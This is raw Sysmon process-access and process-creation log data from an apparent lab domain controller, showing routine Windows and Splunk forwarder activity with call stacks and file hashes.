13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.923{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.742{59A5CD1D-8E63-6005-7600-00000000A301}3172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.214{59A5CD1D-8E63-6005-7500-00000000A301}37683876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:27.064{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.064{59A5CD1D-8E63-6005-7500-00000000A301}3768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.986{59A5CD1D-8E64-6005-7700-00000000A301}38323524C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.829{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 